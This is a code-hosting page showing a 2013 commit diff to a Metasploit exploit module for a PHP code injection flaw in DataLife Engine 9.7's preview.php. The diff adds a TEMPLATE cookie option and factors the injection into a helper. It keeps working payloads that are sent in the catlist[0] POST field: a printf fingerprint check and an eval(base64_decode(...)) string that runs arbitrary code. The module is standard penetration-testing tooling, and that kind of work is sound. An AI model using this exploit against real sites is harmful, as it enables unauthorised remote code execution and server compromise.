infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added template stuff improve

unstable
jvazquez-r7 2013-02-01 11:53:42 +01:00
parent de8572d934
commit bf7bb9952e
1 changed files with 18 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
modules/exploits/unix/webapp/datalife_preview_exec.rb
View File

@ -18,8 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{ 'Description' => %q{
This module exploits a PHP code injection vulnerability DataLife Engine 9.7. This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
The vulnerability exists in preview.php, due to an insecure usage of preg_replace() The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
with the e modifier, which allows to inject arbitrary php code, when the template with the e modifier, which allows to inject arbitrary php code, when there is a
in use contains a [catlist] or [not-catlist] tag. template installed which contains a [catlist] or [not-catlist] tag, even when the
template isn't in use currently. The template can be configured with the TEMPLATE
datastore option.
}, },
'Author' => 'Author' =>
[ [
@ -49,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
], self.class) ], self.class)
end end
@ -57,17 +60,24 @@ class Metasploit3 < Msf::Exploit::Remote
normalize_uri(target_uri.path, 'engine', 'preview.php') normalize_uri(target_uri.path, 'engine', 'preview.php')
end end
def check def send_injection(inj)
fingerprint = rand_text_alpha(4+rand(4))
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => uri, 'uri' => uri,
'method' => 'POST', 'method' => 'POST',
'vars_post' => 'vars_post' =>
{ {
'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" 'catlist[0]' => inj
} },
'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
}) })
res
end
def check
fingerprint = rand_text_alpha(4+rand(4))
res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
if res and res.code == 200 and res.body =~ /#{fingerprint}/ if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
@ -80,14 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
@peer = "#{rhost}:#{rport}" @peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
res = send_request_cgi( res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
{
'uri' => uri,
'method' => 'POST',
'vars_post' =>
{
'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
}
})
end end
end end